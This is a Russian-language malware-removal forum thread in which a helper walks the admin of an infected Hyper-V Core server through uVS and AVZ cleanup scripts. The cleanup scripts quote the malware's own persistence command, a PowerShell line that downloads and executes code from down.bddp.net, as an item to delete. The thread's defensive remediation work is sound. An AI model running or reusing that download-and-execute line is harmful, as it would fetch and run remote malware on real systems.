Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Hyper-v core PowerShell грузит процессор+память (http://forum.oszone.net/showthread.php?t=342797)

TimofeevAGVN53 03-11-2019 16:45 2894597
Hyper-v core PowerShell грузит процессор+память
 
На виртуалке не снять лог по правилам. Сделал как рекомендовали в этой теме - http://forum.oszone.net/thread-342410.html

akok 03-11-2019 17:14 2894600
Доброго дня. Что за виртуалка и почему не удалось собрать логи? Откат точки не рассматриваете?

TimofeevAGVN53 03-11-2019 22:50 2894646
Точнее это не виртуалка, а сам хост сервер - Hyper-v core.
Лог не удаётся собрать потому что пишет что подключен по РДП. Откат не рассматривал.

Sandor 04-11-2019 11:52 2894688
Цитата:
Цитата TimofeevAGVN53
пишет что подключен по РДП »
Да, логи нужно снимать непосредственно на сервере, а не через терминальное подключение.
Кстати, пароли на RDP смените.
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv6.3
    v400c
    ;---------command-block---------
    deltsk %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
    apply
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную.
Подробнее читайте в этом руководстве.


Проверьте уязвимые места:
Выполните скрипт в AVZ при наличии доступа в интернет:

Код:
var
LogPath : string;
ScriptPath : string;
begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';
  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else
begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath)
else begin
      ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
      exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.
В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

TimofeevAGVN53 05-11-2019 09:44 2894782
Спасибо.
1) Почему нужно менять пароль RDP?
2) Когда первый скрипт выполнен он выдаст какое то сообщение?
3) Второй скрипт сообщил что ни каких уязвимостей нет.
4) Выполнил первый скрипт через некоторое время опять процессы powershell - скриншот во вложении

Sandor 05-11-2019 09:51 2894785
Цитата:
Цитата TimofeevAGVN53
Почему нужно менять пароль RDP? »
Не исключено, что проникновение вредоноса происходит через взломанный пароль.

Цитата:
Цитата TimofeevAGVN53
Когда первый скрипт выполнен он выдаст какое то сообщение? »
Нет.

Цитата:
Цитата TimofeevAGVN53
через некоторое время опять процессы powershell »
Соберите свежий образ автозапуска uVS.

TimofeevAGVN53 05-11-2019 10:09 2894788
Раньше CureIt видел вирусную задачу, сейчас не видит.
Лог во вложении.

Sandor 05-11-2019 10:41 2894798
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv6.3
    v400c
    ;---------command-block---------
    delref IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://DOWN.BDDP.NET/NEWOL.DAT?ALLV6&MAC=&AV=&VERSION=6.3.9600&BIT=64-BIT&FLAG2=TRUE&DOMAIN=HARD.NOV&USER=HPV9$&PS=TRUE')
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\C94D3D10-F112B2E2-596AD9FA-E298B03A\150968B4D.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\6267A36F-6CDFBD31-39CB72-2B244C2F\259D075B19.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\AA44598C-D124EA12-25B37650-C44382F9\3B1A5F71A35.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\E3B9B7B4-32056DB4-4A0C5244-4FB3A0DC\8ED1CEBB1B.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\8EF1EB8017.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\13ECE9FC-627FA9C8-8762782E-E41DE93C\C94D31C4.SYS
    delref 752073A1-23F2-4396-85F0-8FDB879ED0ED\[CLSID]
    apply

    deltmp
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перегрузите компьютер вручную.
Подробнее читайте в этом руководстве.

Соберите еще раз образ автозапуска uVS (AutorunsVTChecker уже не нужно запускать).

TimofeevAGVN53 05-11-2019 12:23 2894820
Вложений: 1
Спасибо.
Во вложении.

Sandor 05-11-2019 12:26 2894821
Лог выглядит хорошо. Проблема решена?

TimofeevAGVN53 05-11-2019 15:55 2894881
Вложений: 1
Нет(

Sandor 05-11-2019 16:00 2894883
Скачайте Malwarebytes' Anti-Malware. Установите и запустите.
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь её окончания.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.

TimofeevAGVN53 05-11-2019 16:02 2894884
У меня сервер Hyper-v Core на нём нельзя устанавливать. Не устанавливая можно запустить?

Sandor 05-11-2019 16:44 2894891
Берём тайм-аут пока.

TimofeevAGVN53 05-11-2019 16:48 2894892
ок, спс. Жду

Sandor 06-11-2019 09:28 2894950
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv6.3
    v400c
    deltsk %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
    delref IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://down.bddp.net/NEWOL.DAT?ALLV6&MAC=&AV=&VERSION=6.3.9600&BIT=64-BIT&FLAG2=TRUE&DOMAIN=HARD.NOV&USER=HPV9$&PS=TRUE')
    apply
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную.
Подробнее читайте в этом руководстве.


Ещё раз сделайте образ автозапуска uVS.

TimofeevAGVN53 06-11-2019 15:55 2894997
Вложений: 2
(((

Sandor 06-11-2019 16:02 2895001
Коллеги подсказывают, что скрипт AVZ (по уязвимостям) может не все показать. Поэтому ставьте все доступные обновления.
А также:
Цитата:
по сетке или снаружи лезет.
Или просто по сети с правами админа навешивают.


Время: 23:26.

Время: 23:26.
© OSzone.net 2001-